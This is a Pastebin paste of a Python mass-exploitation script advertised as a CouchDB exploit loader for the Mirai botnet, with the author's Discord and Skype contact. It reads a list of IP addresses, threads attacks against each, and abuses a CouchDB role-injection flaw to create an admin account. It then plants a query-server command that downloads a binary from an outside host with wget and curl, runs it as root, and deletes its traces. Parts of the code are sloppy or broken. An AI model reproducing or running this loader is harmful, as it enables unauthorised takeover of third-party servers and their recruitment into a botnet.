SHARE
TWEET

[COUCHDB EXPLOIT LOADER][PYTHON] [MIRAI]

xB4ckdoorREAL Nov 29th, 2018 313 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Discord link: https://discord.gg/QDy3bUy or contact me on skype: b4ckdoor.porn
  2.  
  3. #!/usr/bin/env python
  4. from requests.auth import HTTPBasicAuth
  5. import random
  6. import requests
  7. import re
  8. import sys
  9. from threading import Thread
  10. from time import sleep
  11.    
  12.  
  13. ips = open(sys.argv[1], "r").readlines()
  14. Rdatabases = ["/a564r6fusmg","/dyejdffyjdxryj","/esreghsrgfbgrsb","/sfafdbsrdgjqef","/fyukddyuodyj","/yfjdued6yjdsza","/wefrhnwgerhgsrh","/sfdrebwbef","/fdfgffrgfdsg"]
  15.  
  16. def getVersion(ip):
  17.     version = requests.get(ip).json()["version"]
  18.     return version
  19.  
  20. def exploit(ip):
  21.     global Rdatabases
  22.     try:
  23.         try:
  24.             if sys.argv[2] == "-r":
  25.                 cmd = "cd /tmp; wget http://b4.ck.do.or//x86; curl wget http://b4.ck.do.or/x86 -O; chmod 777 x86; ./x86 root;"
  26.             elif sys.argv[2] == "-c":
  27.                         cmd = "cd /tmp; wget http://1b4.ck.do.or/x86; curl wget http://b4.ck.do.or/x86 -O; chmod 777 x86; ./x86 root;"
  28.                     elif sys.argv[2] == "-w":
  29.                 cmd = "cd /tmp; wget http://b4.ck.do.or/x86; curl wget http://b4.ck.do.or/x86 -O; chmod 777 x86; ./x86 root;"
  30.             elif sys.argv[2] == "-x":
  31.                         cmd = "cd /tmp; wget http://b4.ck.do.or/x86; curl wget http://1b4.ck.do.or/x86 -O; chmod 777 x86; ./x86 root; "
  32.             elif not sys.argv[2]:
  33.                 print "NOT ENOUGH ARGUMENTS!"
  34.                 sys.exit(0)
  35.         except SyntaxError as e:
  36.             print "\n   Options: (-r|-c|-w|-x)"
  37.         db_ = random.choice(Rdatabases)
  38.         db = db_
  39.         ip = ip.rstrip("\n")
  40.         ip = "http://"+ip+":5984"
  41.         version = getVersion(ip)
  42.         #print("[*] Detected CouchDB Version " + version)
  43.         vv = version.replace(".", "")
  44.         v = int(version[0])
  45.         if v == 1 and int(vv) <= 170:
  46.             version = 1
  47.         elif v == 2 and int(vv) < 211:
  48.             version = 2
  49.         else:
  50.             #print("[-] Version " + version + " not vulnerable.")
  51.             sys.exit()
  52.         with requests.session() as session:
  53.             #print("[*] Attempting %s Version %d"%(ip,v))
  54.             session.headers = {"Content-Type": "application/json"}
  55.      
  56.             try:
  57.                 payload = '{"type": "user", "name": "'
  58.                 payload += "guest"
  59.                 payload += '", "roles": ["_admin"], "roles": [],'
  60.                 payload += '"password": "guest"}'
  61.  
  62.                 pr = session.put(ip + "/_users/org.couchdb.user:guest",
  63.                     data=payload)
  64.  
  65.                 #print("[+] User guest with password guest successfully created.")
  66.             except requests.exceptions.HTTPError:
  67.                 sys.exit()
  68.             session.auth = HTTPBasicAuth("guest", "guest")
  69.             try:
  70.                 if version == 1:
  71.                     session.put(ip + "/_config/query_servers/cmd",
  72.                             data='"' + cmd + '"')
  73.                     #print("[+] Created payload at: " + ip + "/_config/query_servers/cmd")
  74.                 else:
  75.                     host = session.get(ip + "/_membership").json()["all_nodes"][0]
  76.                     session.put(ip + "/_node/" + ip + "/_config/query_servers/cmd",
  77.                             data='"' + cmd + '"')
  78.                     #print("[+] Created payload at: " + ip + "/_node/" + host + "/_config/query_servers/cmd")
  79.             except requests.exceptions.HTTPError as e:
  80.                 sys.exit()
  81.      
  82.             try:
  83.                 session.put(ip + db)
  84.                 session.put(ip + db + "/zero", data='{"_id": "HTP"}')
  85.             except requests.exceptions.HTTPError:
  86.                 sys.exit()
  87.      
  88.             # Execute payload
  89.             try:
  90.                 if version == 1:
  91.                     session.post(ip + db + "/_temp_view?limit=10",
  92.                             data='{"language": "cmd", "map": ""}')
  93.                 else:
  94.                     session.post(ip + db + "/_design/zero",
  95.                             data='{"_id": "_design/zero", "views": {"god": {"map": ""} }, "language": "cmd"}')
  96.                 print("[+] Command executed: " + cmd)
  97.             except requests.exceptions.HTTPError:
  98.                 sys.exit()
  99.  
  100.             #print("[*] Cleaning up.")
  101.  
  102.             # Cleanup database
  103.             try:
  104.                 session.delete(ip + db)
  105.             except requests.exceptions.HTTPError:
  106.                 sys.exit()
  107.      
  108.             # Cleanup payload
  109.             try:
  110.                 if version == 1:
  111.                     session.delete(ip + "/_config/query_servers/cmd")
  112.                 else:
  113.                     host = session.get(ip + "/_membership").json()["all_nodes"][0]
  114.                     session.delete(ip + "/_node" + host + "/_config/query_servers/cmd")
  115.             except requests.exceptions.HTTPError:
  116.                 sys.exit()
  117.     except:
  118.         pass
  119. for ip in ips:
  120.     try:
  121.         hoho = Thread(target=exploit, args=(ip,))
  122.         hoho.start()
  123.         sleep(0.001)
  124.     except:
  125.         pass
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top